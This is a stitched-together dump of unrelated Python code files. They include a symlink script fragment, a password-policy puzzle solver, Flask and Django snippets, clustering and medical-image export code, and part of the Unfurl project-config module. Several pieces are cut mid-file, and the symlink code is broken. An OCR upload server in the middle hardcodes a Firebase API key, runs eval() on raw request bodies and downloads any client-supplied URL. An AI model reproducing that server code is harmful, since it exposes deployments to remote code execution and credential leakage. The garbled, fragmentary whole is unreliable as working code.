where = input ('select a name for the file containt your dirocroty sym >>> ')
os.system('ln -s %s %s') % (where, directory )
print('your symlin in %s ') % (where)
os.system(pwd)
sym()
else:
print('Does not support this system, Only Linux :D')
|
import pandas as pd
i = 0
df = pd.read_excel("Puzzel 2.xlsx")
# Clean Up
df["Policy"] = df["Policy"].str.strip()
df["Password"] = df["Password"].str.strip()
# Convert columns from Object to String
df['Policy'] = df['Policy'].convert_dtypes()
df['Password'] = df['Password'].convert_dtypes()
# Getting Columns with required info to check passwords
df["Letter"] = [x.strip()[-1] for x in df['Policy']]
df["LowerLimit"] = [x.split("-", -1)[0] for x in df['Policy']]
df["UpperLimit"] = [x.split("-", -1)[1].split(" ", -1)[0] for x in df['Policy']]
df["Letter"] = df["Letter"].convert_dtypes()
df["LowerLimit"] = df["LowerLimit"].astype('int')
df["UpperLimit"] = df["UpperLimit"].astype('int')
# Loop through elements and check every row
count = 0
for i in range(0, 1000):
L = df["Letter"].iloc[i]
S = df["LowerLimit"].iloc[i]
SP = df["UpperLimit"].iloc[i]
P = df["Password"].iloc[i]
if P[S-1] == L and P[SP-1] == L:
pass
elif P[S-1] != L and P[SP-1] != L:
pass
else:
count += 1
print(count)
|
from flask import Flask, request, jsonify, make_response
from PIL import Image
import PIL
from flask_cors import CORS, cross_origin
from io import BytesIO
import base64
import pretrained_example
app = Flask(__name__)
cors = CORS(app)
app.config['CORS_HEADERS'] = 'Content-Type'
@app.after_request
def after_request(response):
header = response.headers
header['Access-Control-Allow-Origin'] = '*'
return response
def pil2datauri(data):
img = generate_random_image(data)
data = BytesIO()
img.save(data, "JPEG")
data64 = base64.b64encode(data.getvalue())
return u'data:img/jpeg;base64,'+data64.decode('utf-8')
@app.route('/gen', methods=['OPTIONS', 'POST'])
def create_task():
if request.method == "OPTIONS":
return _build_cors_prelight_response()
elif request.method == "POST":
if not request.json:
abort(400)
data = request.json
g = pil2datauri(data)
return g, 201
else:
abort(400)
def _build_cors_prelight_response():
response = make_response()
response.headers.add("Access-Control-Allow-Origin", "*")
response.headers.add('Access-Control-Allow-Headers', "*")
response.headers.add('Access-Control-Allow-Methods', "*")
return response
if __name__ == "__main__":
app.run(host='0.0.0.0', debug=False)
|
# Generated by Django 2.2 on 2019-04-12 15:35
from django.db import migrations, models
import django.db.models.deletion
import yohbiteapp.models
class Migration(migrations.Migration):
dependencies = [
('yohbiteapp', '0008_driver_location'),
]
operations = [
migrations.CreateModel(
name='Country',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('country', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='District',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('state', models.CharField(max_length=100)),
('description', models.TextField(default='No Description')),
('country', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='yohbiteapp.Country')),
],
),
migrations.CreateModel(
name='Local',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('local', models.CharField(max_length=100)),
('description', models.TextField(default='No Description')),
('state', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='yohbiteapp.District')),
],
),
migrations.CreateModel(
name='LocalType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('local', models.CharField(max_length=100)),
('description', models.TextField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='MealType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('local', models.CharField(max_length=100)),
('description', models.TextField(blank=True, null=True)),
],
),
migrations.AlterField(
model_name='meal',
name='image',
field=models.ImageField(upload_to=yohbiteapp.models.meals_upload_path),
),
migrations.AlterField(
model_name='restaurant',
name='logo',
field=models.ImageField(upload_to=yohbiteapp.models.restuarant_upload_path),
),
migrations.CreateModel(
name='Location',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.TextField(blank=True, null=True)),
('local', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='yohbiteapp.Local')),
('localType', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='yohbiteapp.LocalType')),
],
),
]
|
from sklearn.cluster import KMeans
from sklearn import manifold
import matplotlib.pyplot as plt
import numpy as np
from sentence_transformers import SentenceTransformer
model = SentenceTransformer('paraphrase-TinyBERT-L6-v2')
n_clusters = 20
# Read file and make embedding
f = open('../final.txt', 'r')
words = []
while True:
line = f.readline()
if not line:
break
words.append(line[:-1]) # remove the last '\n'
embs = model.encode(words) # embeddings
words = np.array(words)
embs = np.array(embs)
# Clustering
kmeans = KMeans(n_clusters=n_clusters, random_state=0).fit(embs) # clustering
labels = kmeans.labels_
# Write file
for i in range(n_clusters):
pos = np.where(labels==i)
w = words[pos[0]]
f_name = 'out_%s.txt' % i
f_out = open(f_name, 'w')
for j in w:
f_out.write(j+'\n')
f_out.close()
f.close()
# Visualization
tsne = manifold.TSNE(n_components=2, init='pca', random_state=0).fit_transform(embs)
figure, axesSubplot = plt.subplots()
axesSubplot.scatter(tsne[:, 0], tsne[:, 1], c=labels)
|
import SimpleITK as sitk
def printst(step,flow_field_x1, ed_source, flow_field_x2, es_source):
# pt = source[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.00, 1.00, 1.00))
# sitk.WriteImage(out, './state/source' + str(step) + '.nii')
# pt = img_ed[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.00, 1.00, 1.00))
# sitk.WriteImage(out, './state/ed' + str(step) + '.nii')
#
# pt = img_es[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.00, 1.00, 1.00))
# sitk.WriteImage(out, './state/es' + str(step) + '.nii')
# pt = img_pre[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/esaft' + str(step) + '.nii')
#
# pt = img_mid[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/esmid' + str(step) + '.nii')
#
# pt = img_aft[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/espre' + str(step) + '.nii')
# mm = labeled[0, 1, :, :, :] * 1 + labeled[0, 2, :, :, :] * 2 + labeled[0, 3, :, :, :] * 3
# pt = mm.data.cpu().numpy()
# # pt = labeled[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.00, 1.00, 1.00))
# sitk.WriteImage(out, './state/labeled' + str(step) + '.nii')
#
# mm = labeles[0, 1, :, :, :] * 1 + labeles[0, 2, :, :, :] * 2 + labeles[0, 3, :, :, :] * 3
# pt = mm.data.cpu().numpy()
# # pt = labeles[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.00, 1.00, 1.00))
# sitk.WriteImage(out, './state/labeles' + str(step) + '.nii')
# pt = warped_ed[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/es-ed' + str(step) + '.nii')
pt = ed_source[0, 0, :, :, :].data.cpu().numpy()
# pt = np.transpose(pt, (2, 1, 0))
out = sitk.GetImageFromArray(pt)
out.SetSpacing((1.00, 1.00, 1.00))
sitk.WriteImage(out, './state/ed-source' + str(step) + '.nii')
pt = es_source[0, 0, :, :, :].data.cpu().numpy()
# pt = np.transpose(pt, (2, 1, 0))
out = sitk.GetImageFromArray(pt)
out.SetSpacing((1.00, 1.00, 1.00))
sitk.WriteImage(out, './state/es-source' + str(step) + '.nii')
# pt = step1_flow[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/speed-es-pre' + str(step) + '.nii')
#
# pt = step2_flow[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/speed-es-mid' + str(step) + '.nii')
#
# pt = step3_flow[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/speed-es-aft' + str(step) + '.nii')
#
# pt = step4_flow[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/speed-es-ed' + str(step) + '.nii')
pt = flow_field_x1[0, :, :, :, :].data.cpu().numpy()
# pt = np.transpose(pt, (2, 1, 0))
out = sitk.GetImageFromArray(pt)
out.SetSpacing((1.00, 1.00, 1.00))
sitk.WriteImage(out, './state/ed_source_flow' + str(step) + '.nii')
pt = flow_field_x2[0, :, :, :, :].data.cpu().numpy()
# pt = np.transpose(pt, (2, 1, 0))
out = sitk.GetImageFromArray(pt)
out.SetSpacing((1.00, 1.00, 1.00))
sitk.WriteImage(out, './state/es_source_flow' + str(step) + '.nii')
# pt = flow_field[0, :, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/wholeflow' + str(step) + '.nii')
#
# pt = speed_combin[0, :, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/speed-wholeflow' + str(step) + '.nii')
#
# mm = fuse_es_seg[0, 1, :, :, :] * 1 + fuse_es_seg[0, 2, :, :, :] * 2 + fuse_es_seg[0, 3, :, :, :] * 3
# pt = mm.data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# # pt = start_seg[0, 0, :, :, :].data.cpu().numpy()
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/fuse-seg-es' + str(step) + '.nii')
#
# mm = fuse_ed_seg[0, 1, :, :, :] * 1 + fuse_ed_seg[0, 2, :, :, :] * 2 + fuse_ed_seg[0, 3, :, :, :] * 3
# pt = mm.data.cpu().numpy()
# # pt = final_seg[0, 0, :, :, :].data.cpu().numpy()
#
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/fuse-seg-ed' + str(step) + '.nii')
#
# mm = es_seg[0, 1, :, :, :] * 1 + es_seg[0, 2, :, :, :] * 2 + es_seg[0, 3, :, :, :] * 3
# pt = mm.data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# # pt = start_seg[0, 0, :, :, :].data.cpu().numpy()
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/seg-es' + str(step) + '.nii')
#
# mm = ed_seg[0, 1, :, :, :] * 1 + ed_seg[0, 2, :, :, :] * 2 + ed_seg[0, 3, :, :, :] * 3
# pt = mm.data.cpu().numpy()
# # pt = final_seg[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/seg-ed' + str(step) + '.nii')
#
# mm = es_seg_flow[0, 1, :, :, :] * 1 + es_seg_flow[0, 2, :, :, :] * 2 + es_seg_flow[0, 3, :, :, :] * 3
# pt = mm.data.cpu().numpy()
# # pt = flfinseg[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/reg-seg-es' + str(step) + '.nii')
#
# mm = ed_seg_flow[0, 1, :, :, :] * 1 + ed_seg_flow[0, 2, :, :, :] * 2 + ed_seg_flow[0, 3, :, :, :] * 3
# pt = mm.data.cpu().numpy()
# # pt = flstaseg[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/reg-seg-ed' + str(step) + '.nii')
#
# mm = seg_es[0, 1, :, :, :] * 1 + seg_es[0, 2, :, :, :] * 2 + seg_es[0, 3, :, :, :] * 3
# pt = mm.data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# # pt = start_seg[0, 0, :, :, :].data.cpu().numpy()
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/seg-es' + str(step) + '.nii')
#
# mm = seg_ed[0, 1, :, :, :] * 1 + seg_ed[0, 2, :, :, :] * 2 + seg_ed[0, 3, :, :, :] * 3
# pt = mm.data.cpu().numpy()
# # pt = final_seg[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/seg-ed' + str(step) + '.nii')
|
# a=['banana','apple','microsoft']
# for i in a:
# print(i)
# b=[20,10,5]
# for j in b:
# print(j)
# s=0
# for i in b:
# s+=i
# print(s)
# c=list(range(1,5))
# print(c)
s=0
for i in range(1,5):
s+=i
print(s)
s1=0
for i in range(1,8):
if i%3==0:
s1+=i
print(s1)
|
for total_budget in range(1, 11):
fileresult = [[], [], []]
for setting in range(2, 3):
if setting == 1:
data_name = "email"
product_name = "prod_r1p3n1"
num_ratio, num_price = 1, 3
elif setting == 2:
data_name = "email"
product_name = "prod_r1p3n2"
num_ratio, num_price = 1, 3
elif setting == 3:
data_name = "email"
product_name = "prod_r1p4n1"
num_ratio, num_price = 1, 4
elif setting == 4:
data_name = "email"
product_name = "prod_r1p4n2"
num_ratio, num_price = 1, 4
elif setting == 5:
data_name = "email"
product_name = "prod_r1p5n1"
num_ratio, num_price = 1, 5
elif setting == 6:
data_name = "email"
product_name = "prod_r1p5n2"
num_ratio, num_price = 1, 5
elif setting == 7:
data_name = "email"
product_name = "prod_r2p2n1"
num_ratio, num_price = 2, 2
elif setting == 8:
data_name = "email"
product_name = "prod_r2p2n2"
num_ratio, num_price = 2, 2
for times in range(9, 109, 10):
result_name = "result/" + data_name + "_" + product_name + "_sn/" + data_name + "_" + product_name + "_b" + str(total_budget) + "_i" + str(times+1) + ".txt"
lnum = 0
with open(result_name) as f:
for line in f:
lnum += 1
if lnum == 1 or lnum == 3:
continue
elif lnum == 2:
(l) = line.split()
avg_pro = float(l[2])
fileresult[0].append(avg_pro)
elif lnum == 4:
atime, ttime = "", ""
(l) = line.split()
avg_time = list(l[5])
total_time = list(l[2])
for at in avg_time[0: len(avg_time) - 3]:
atime = atime + at
for tt in total_time[0: len(total_time) - 4]:
ttime = ttime + tt
fileresult[1].append(float(atime))
fileresult[2].append(float(ttime))
else:
break
fw = open("result/avg_pro_b" + str(total_budget) + ".txt", 'w')
for num in fileresult[0]:
fw.write(str(num) + "\n")
fw.close()
fw = open("result/avg_time_b" + str(total_budget) + ".txt", 'w')
for num in fileresult[1]:
fw.write(str(num) + "\n")
fw.close()
fw = open("result/total_time_b" + str(total_budget) + ".txt", 'w')
for num in fileresult[2]:
fw.write(str(num) + "\n")
fw.close()
|
#This is challenge
# define a function take any no of list containing number
l1,l2,l3=[1,2,3], [4,5,6],[7,8,9]
#return average
#(1+4+7)/3,(2,5,8)/3,(3,6,9)/3
# try to make this anonymous function in one line using lambda
#def func(*args):
# promedios=tuple(map(lambda x: sum(x)/len(x),args))
# return promedios
#print(func(l1,l2,l3))
#other method
def average_finder(*args):
average=[]
for pair in zip(*args):
average.append(sum(pair)/len(pair))
return average
print(average_finder(l1,l2,l3))
promedios= lambda *args:[sum(pair)/len(pair) for pair in zip(*args)]
print(promedios(l1,l2,l3))
|
def conjugate(verb, pronoun, tense):
verbs = ["ayudar", "bailar", "buscar", "comprar", "dibujar", "escuchar", "estar",
|
from django.conf.urls.defaults import *
urlpatterns = patterns('devices.views',
(r'^$', 'index'),
(r'^(?P<device_id>\d+)/wipe/$', 'wipe'),
(r'^(?P<device_id>\d+)/trackfrequency', 'update_track_frequency'),
(r'^(?P<device_id>\d+)/send/$', 'send_c2dm'),
)
|
import os, sys, time, copy, datetime
from flask import Flask, render_template, request, jsonify, current_app
import argparse
import subprocess
import pytesseract
import json
import wget
import time
from detect_rectangle import detect_rect
from barcode import readBar
from detect_region import detect_region
from detect_line import boxes_pipeline
from PIL import Image, ImageDraw
import crnn_ocr
from ctpn.get_boxes import LineDetector
from firebase import Firebase
import urllib.request
firebaseConfig = {
"apiKey": "AIzaSyAOew38a3cmVkrClA3TfIeJwgP-xEBIhdE",
"authDomain": "vnpost-6d57e.firebaseapp.com",
"databaseURL": "https://vnpost-6d57e.firebaseio.com",
"projectId": "vnpost-6d57e",
"storageBucket": "vnpost-6d57e.appspot.com",
"messagingSenderId": "419665295516",
"appId": "1:419665295516:web:7e3ec35c1c4e7514"
}
firebase = Firebase(firebaseConfig)
line_detector = LineDetector("ctpn/network/ctpn.pb")
app = Flask(__name__)
APP_ROOT = os.path.dirname(os.path.abspath(__file__))
DPI = 300
ALL_LINE_SIZE = (1000, 64)
all_ocrer = crnn_ocr.CRNNOCR(model_path="../duc/vnpost_ocr/ocr.model", normalize_size=ALL_LINE_SIZE,
alphabet_path="../duc/vnpost_ocr/char")
root_dir = os.getcwd()
def process_region(path):
list_lines = boxes_pipeline(path, line_detector)
print (list_lines)
list_text = []
org_img = Image.open(path).convert("RGB")
for line in list_lines:
# crop
cropped = org_img.crop(line)
# detect
line_content, sent_prob = all_ocrer.run_image(cropped)
print ("content:", line_content, sent_prob )
list_text.append(line_content)
name = list_text[0]
phone = list_text[-1]
address = " ".join(list_text[1:-1])
return {"name":name, "address":address, "phone":phone}
app.config['JSON_AS_ASCII'] = False
@app.route("/upload", methods=['POST'])
def upload():
# upload a file: curl -F "file=@/data/workspace/evnml/data/pdf/14178.PDF" localhost:2019/upload
data_path = os.path.join(root_dir, "../data")
os.makedirs(name=data_path, exist_ok=True)
try:
if request.method == 'POST':
_data = request.data.decode()
if (len(_data)):
url = eval(_data)["url"]
else:
url = request.form.get('url')
tmp_name = "../data/{}.jpg".format(int(time.time()*1000))
print ("[INFO] Save",url," to ", tmp_name)
# wget.download(url, tmp_name, bar=None)
urllib.request.urlretrieve(url, tmp_name)
detect_rect.run(tmp_name)
detect_region.run("crop.png")
bar_string = readBar.run("bar.png")
#
result_metadata = {}
result_metadata["from"] = process_region("region_from.png")
result_metadata["to"] = process_region("region_to.png")
result_metadata["barcode"] = bar_string
result_metadata["status"] = True
return jsonify(result_metadata)
except Exception as e:
print (e)
return jsonify({"status":False, "error":e})
if __name__ == "__main__":
parser = argparse.ArgumentParser()
app.run(host="0.0.0.0", port=30033, debug=False)
|
class VolSmileData:
def __init__(self, pillar_date, rd, rf, vols):
self.pillar_date = pillar_date
self.rd = rd
self.rf = rf
self.vols = vols
# Sticky Strike
class VolSurfaceData:
def __init__(self, underlying_name, market_date, spot_date, spot, strikes, smiles):
self.underlying_name = underlying_name
self.market_date = market_date
self.spot_date = spot_date
self.spot = spot
self.strikes = strikes
self.smiles = smiles
|
#set of character actions for game play
import random
def say(noun):
return 'You said "{}"'.format(noun)
def attacknow(noun):
ca=char_actions.character("Pauly","Elf")
return ca.attack("Elf")
|
# Copyright (c) 2020 Adam Souzis
# SPDX-License-Identifier: MIT
"""
Classes for managing the local environment.
Repositories can optionally be organized into projects that have a local configuration.
By convention, the "home" project defines a localhost instance and adds it to its context.
"""
import os
import os.path
import datetime
import six
from .repo import Repo, normalizeGitUrl, splitGitUrl, RepoView
from .util import UnfurlError
from .merge import mergeDicts
from .yamlloader import YamlConfig, makeVaultLib
from . import DefaultNames, getHomeConfigPath
from six.moves.urllib.parse import urlparse
_basepath = os.path.abspath(os.path.dirname(__file__))
class Project(object):
"""
A Unfurl project is a folder that contains at least a local configuration file (unfurl.yaml),
one or more ensemble.yaml files which maybe optionally organized into one or more git repositories.
"""
def __init__(self, path, homeProject=None):
assert isinstance(path, six.string_types), path
parentConfig = homeProject and homeProject.localConfig or None
self.projectRoot = os.path.abspath(os.path.dirname(path))
if os.path.exists(path):
self.localConfig = LocalConfig(path, parentConfig)
else:
self.localConfig = LocalConfig(parentConfig=parentConfig)
self._setRepos()
if self.projectRepo and homeProject:
homeProject.localConfig.registerProject(self)
def _setRepos(self):
# abspath => RepoView:
self.workingDirs = Repo.findGitWorkingDirs(self.projectRoot)
# the project repo if it exists manages the project config (unfurl.yaml)
projectRoot = self.projectRoot
if projectRoot in self.workingDirs:
self.projectRepo = self.workingDirs[projectRoot].repo
else:
# project maybe part of a containing repo (if created with --existing option)
repo = Repo.findContainingRepo(self.projectRoot)
# make sure projectroot isn't excluded from the containing repo
if repo and not repo.isPathExcluded(self.projectRoot):
self.projectRepo = repo
self.workingDirs[repo.workingDir] = repo.asRepoView()
else:
self.projectRepo = None
if self.projectRepo:
# Repo.findGitWorkingDirs() doesn't look inside git working dirs
# so look for repos in dirs that might be excluded from git
for dir in self.projectRepo.findExcludedDirs(self.projectRoot):
if projectRoot in dir and os.path.isdir(dir):
Repo.updateGitWorkingDirs(self.workingDirs, dir, os.listdir(dir))
# add referenced local repositories outside of the project
for path in self.localConfig.localRepositories:
if os.path.isdir(path):
# XXX assumes its a git repo, should compare and validate lock metadata
Repo.updateGitWorkingDirs(self.workingDirs, path, os.listdir(path))
@staticmethod
def normalizePath(path):
path = os.path.abspath(path)
if not os.path.exists(path):
isdir = not path.endswith(".yml") and not path.endswith(".yaml")
else:
isdir = os.path.isdir(path)
if isdir:
return os.path.join(path, DefaultNames.LocalConfig)
else:
return path
@staticmethod
def findPath(testPath):
"""
Walk parents looking for unfurl.yaml
"""
current = os.path.abspath(testPath)
while current and current != os.sep:
test = os.path.join(current, DefaultNames.LocalConfig)
if os.path.exists(test):
return test
test = os.path.join(
current, DefaultNames.ProjectDirectory, DefaultNames.LocalConfig
)
if os.path.exists(test):
return test
current = os.path.dirname(current)
return None
@property
def venv(self):
venv = os.path.join(self.projectRoot, ".venv")
if os.path.isdir(venv):
return venv
return None
def getAsdfPaths(self, asdfDataDir, toolVersions={}):
paths = []
toolVersionsFilename = (
os.getenv("ASDF_DEFAULT_TOOL_VERSIONS_FILENAME") or ".tool-versions"
)
versionConf = os.path.join(self.projectRoot, toolVersionsFilename)
if os.path.exists(versionConf):
with open(versionConf) as conf:
for line in conf.readlines():
line = line.strip()
if line and line[0] != "#":
tokens = line.split()
plugin = tokens.pop(0)
versions = toolVersions.setdefault(plugin, set())
for version in tokens:
if version != "system":
path = os.path.join(
asdfDataDir, "installs", plugin, version, "bin"
)
versions.add(version)
if os.path.isdir(path):
paths.append(path)
return paths
def getRepos(self):
repos = [r.repo for r in self.workingDirs.values()]
if self.projectRepo and self.projectRepo not in repos:
repos.append(self.projectRepo)
return repos
def getDefaultEnsemblePath(self):
fullPath = self.localConfig.getDefaultManifestPath()
if fullPath:
return fullPath
return os.path.join(
self.projectRoot, DefaultNames.EnsembleDirectory, DefaultNames.Ensemble
)
def findDefaultInstanceManifest(self):
fullPath = self.localConfig.getDefaultManifestPath()
if fullPath:
if not os.path.exists(fullPath):
raise UnfurlError(
"The default ensemble found in %s does not exist: %s"
% (self.localConfig.config.path, os.path.abspath(fullPath))
)
return fullPath
else:
# no manifest specified in the project config so check the default locations
fullPath = os.path.join(
self.projectRoot, DefaultNames.EnsembleDirectory, DefaultNames.Ensemble
)
if os.path.exists(fullPath):
return fullPath
fullPath2 = os.path.join(self.projectRoot, DefaultNames.Ensemble)
if os.path.exists(fullPath2):
return fullPath2
raise UnfurlError(
'The can not find an ensemble in a default location: "%s" or "%s"'
% (fullPath, fullPath2)
)
def getRelativePath(self, path):
return os.path.relpath(os.path.abspath(path), self.projectRoot)
def isPathInProject(self, path):
return not self.getRelativePath(path).startswith("..")
def _createPathForGitRepo(self, gitUrl):
name = Repo.getPathForGitRepo(gitUrl)
return self.getUniquePath(name)
def getUniquePath(self, name):
basename = name
counter = 1
while os.path.exists(os.path.join(self.projectRoot, name)):
name = basename + str(counter)
counter += 1
return os.path.join(self.projectRoot, name)
def findGitRepo(self, repoURL, revision=None):
candidate = None
for dir, repository in self.workingDirs.items():
repo = repository.repo
if repoURL.startswith("git-local://"):
initialCommit = urlparse(repoURL).netloc.partition(":")[0]
match = initialCommit == repo.getInitialRevision()
else:
match = normalizeGitUrl(repoURL) == normalizeGitUrl(repo.url)
if match:
if revision:
if repo.revision == repo.resolveRevSpec(revision):
return repo
candidate = repo
else:
return repo
return candidate
def findPathInRepos(self, path, importLoader=None):
"""If the given path is part of the working directory of a git repository
return that repository and a path relative to it"""
# importloader is unused until pinned revisions are supported
candidate = None
for dir in sorted(self.workingDirs.keys()):
repo = self.workingDirs[dir].repo
filePath = repo.findRepoPath(path)
if filePath is not None:
return repo, filePath, repo.revision, False
# XXX support bare repo and particular revisions
# need to make sure path isn't ignored in repo or compare candidates
# filePath, revision, bare = repo.findPath(path, importLoader)
# if filePath is not None:
# if not bare:
# return repo, filePath, revision, bare
# else: # if it's bare see if we can find a better candidate
# candidate = (repo, filePath, revision, bare)
return candidate or None, None, None, None
def createWorkingDir(self, gitUrl, ref=None):
localRepoPath = self._createPathForGitRepo(gitUrl)
repo = Repo.createWorkingDir(gitUrl, localRepoPath, ref)
# add to workingDirs
self.workingDirs[os.path.abspath(localRepoPath)] = repo.asRepoView()
return repo
def findGitRepoFromRepository(self, repoSpec):
repoUrl = repoSpec.url
return self.findGitRepo(splitGitUrl(repoUrl)[0])
def findOrClone(self, repo):
gitUrl = repo.url
existingRepo = self.findGitRepo(gitUrl)
if existingRepo:
return existingRepo
# if not found:
localRepoPath = os.path.abspath(
self._createPathForGitRepo(repo.workingDir or gitUrl)
)
newRepo = repo.clone(localRepoPath)
# use gitUrl to preserve original origin
self.workingDirs[localRepoPath] = RepoView(dict(name="", url=gitUrl), newRepo)
return newRepo
class LocalConfig(object):
"""
Represents the local configuration file, which provides the environment that manifests run in, including:
instances imported from other ensembles, inputs, environment variables, secrets and local configuration.
It consists of:
* a list of ensemble manifests with their local configuration
* the default local and secret instances"""
# don't merge the value of the keys of these dicts:
replaceKeys = [
"inputs",
"attributes",
"schemas",
"connections",
"manifest",
"environment",
]
def __init__(self, path=None, parentConfig=None, validate=True):
defaultConfig = {"apiVersion": "unfurl/v1alpha1", "kind": "Project"}
self.config = YamlConfig(
defaultConfig, path, validate, os.path.join(_basepath, "unfurl-schema.json")
)
self.manifests = self.config.expanded.get("manifests") or []
self.projects = self.config.expanded.get("projects") or {}
contexts = self.config.expanded.get("contexts", {})
if parentConfig:
parentContexts = parentConfig.config.expanded.get("contexts", {})
contexts = mergeDicts(
parentContexts, contexts, replaceKeys=self.replaceKeys
)
self.contexts = contexts
self.parentConfig = parentConfig
self.localRepositories = self.config.expanded.get("localRepositories") or {}
def getContext(self, manifestPath, context):
localContext = self.contexts.get("defaults") or {}
contextName = "defaults"
for spec in self.manifests:
if manifestPath == self.adjustPath(spec["file"]):
# use the context associated with the given manifest
contextName = spec.get("context", contextName)
break
if contextName != "defaults" and self.contexts.get(contextName):
localContext = mergeDicts(
localContext, self.contexts[contextName], replaceKeys=self.replaceKeys
)
return mergeDicts(context, localContext, replaceKeys=self.replaceKeys)
def adjustPath(self, path):
"""
Makes sure relative paths are relative to the location of this local config
"""
return os.path.join(self.config.getBaseDir(), path)
def getDefaultManifestPath(self):
if len(self.manifests) == 1:
return self.adjustPath(self.manifests[0]["file"])
else:
for spec in self.manifests:
if spec.get("default"):
return self.adjustPath(spec["file"])
return None
def createLocalInstance(self, localName, attributes):
# local or secret
from .runtime import NodeInstance
if "default" in attributes:
if not "default" in attributes.get(".interfaces", {}):
attributes.setdefault(".interfaces", {})[
"default"
] = "unfurl.support.DelegateAttributes"
if "inheritFrom" in attributes:
if not "inherit" in attributes.get(".interfaces", {}):
attributes.setdefault(".interfaces", {})[
"inherit"
] = "unfurl.support.DelegateAttributes"
instance = NodeInstance(localName, attributes)
instance._baseDir = self.config.getBaseDir()
return instance
def registerProject(self, project):
# update, if necessary, localRepositories and projects
key, local = self.config.searchIncludes(key="localRepositories")
if not key and "localRepositories" not in self.config.config:
# localRepositories doesn't exist, see if we are including a file inside "local"
pathPrefix = os.path.join(self.config.getBaseDir(), "local")
key, local = self.config.searchIncludes(pathPrefix=pathPrefix)
if not key:
local = self.config.config
repo = project.projectRepo
localRepositories = local.setdefault("localRepositories", {})
lock = repo.asRepoView().lock()
if localRepositories.get(repo.workingDir) != lock:
